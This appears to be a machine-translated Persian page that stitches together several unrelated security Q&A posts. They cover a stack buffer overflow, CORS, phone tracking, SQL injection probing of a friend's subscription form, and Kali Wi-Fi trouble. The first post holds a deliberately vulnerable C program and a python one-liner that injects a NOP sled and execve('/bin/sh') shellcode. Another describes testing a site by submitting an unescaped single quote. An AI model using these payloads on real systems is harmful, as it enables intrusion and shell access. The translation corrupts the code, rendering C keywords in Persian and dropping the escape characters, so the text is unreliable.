سرریز بافر – قادر به اجرای shellcode تزریق نیست

 #include 

void secret ()
{
    printf ("تبریک!  n")؛
}

void echo ()
{
    array char [60]؛
    اسکن ("٪ s"، آرایه)؛
    printf ("شما وارد:٪ s  n"، آرایه)؛
}

int main ()
{
    echo ()؛
    بازگشت 0؛
}

بالا کدی است که من سعی می کنم از آن استفاده کنم.

آدرس آدرس ebp را با استفاده از gdb یافتم، اگر چه می دانم دشوار است که به مکان دقیق اشاره شود. من استفاده از روش NOP سورتمه

اندازه بافر اختصاص داده شده – 0x44 – 68bytes

کد پوسته – 25 بایت

python -c چاپ ' x90 "* 47 + x31 xc0 x50 x68 x2f x2f x73 x68 x68 x2f x62 x69 x6e x89 xe3 x50 x89 xe2 x53 x89 xe1 xb0 x0b xcd x80 "+" xa8 xbb xff xff "'| ./test

من سعی می کنم به جایی از وسط NOP sled بروید.

و دریافت تقصیر تقسیم نیست، اما من دسترسی به پوسته را دریافت نمی

http – چه حزبی محافظت نشده است با CORS غیر فعال نیست؟

در اینجا چیزی است که من در مورد CORS می دانم: این اجازه می دهد تا شما به دسترسی به داده ها در دامنه دیگری از ظاهر هر وب سایت دیگر، تا زمانی که اموال access-control-allowed-origin دستگاه که داده ها را خدمت می کند.

نرم افزار دسکتاپ می تواند داده ها را از هر وب سایت بیرون بکشد و آنچه را که با آن انتخاب می کند، انجام دهد، اما مرورگرهای وب به طور خاص از گرفتن اطلاعات از حوزه های مختلف محدود نمی شوند. ] بنابراین، عدم دسترسی به cors در حفاظت از سرور از خدمت به سایت اشتباه است، و یا از مرورگر جلو در برخی از راه محافظت می کند؟

شبکه – آیا یک ارائه دهنده تلفن می تواند گوشی شما را ردیابی کند اگر سیم کارت آنها در گوشی نیست؟

این سایت از کوکی ها برای ارائه خدمات ما و نمایش آگهی های مرتبط و لیست های شغلی استفاده می کند.
با استفاده از سایت ما، شما تأیید میکنید که ما خط مشی کوکیها، خط مشی رازداری و شرایط خدمات ما را خوانده و درک کردهاید.
استفاده شما از محصولات و خدمات سرریز پشته، از جمله شبکه سرریز پشته، تحت این شرایط و ضوابط است.
                

برنامه وب – تنها نقل قول ها 'sanitized نیست

من در حال تلاش برای پیدا کردن مسائل امنیتی در سایت دوست من هستم.
یک جعبه ورودی برای اشتراک وجود دارد. من می توانم آدرس ایمیل من را وارد کنید:

 هنری  @ gmail.com

پس از انجام کارهای مختلف، متوجه شدم > < / رد می شود

اما آن را می پذیرد '

اگر من پست من را به عنوان

هنری ' @ gmail.com

سرور درخواست را می پذیرد.

بنابراین یک نقل قول ' فرار نیست

هر گونه امکانات برای تزریق Sql؟
یا هر گونه آسیب پذیری دیگر؟

قادر به دسترسی به اینترنت کالی لینوکس نیست

دو بار Macbook Pro را بوت کردم، آداپتور USB Panda Wireless Wireless را وصل کردم و WIFI خود را پیکربندی کردم، اما هنوز نمیتوانم در توزیع لینوکس Kali به اینترنت دسترسی پیدا کنم. من کنجکاو بودم که یک فایل یا پوشه ای وجود داشته باشد که برای تغییر پیکربندی من نیاز است یا اگر یک دستور ترمینال برای رفع این مشکل وجود داشته باشد.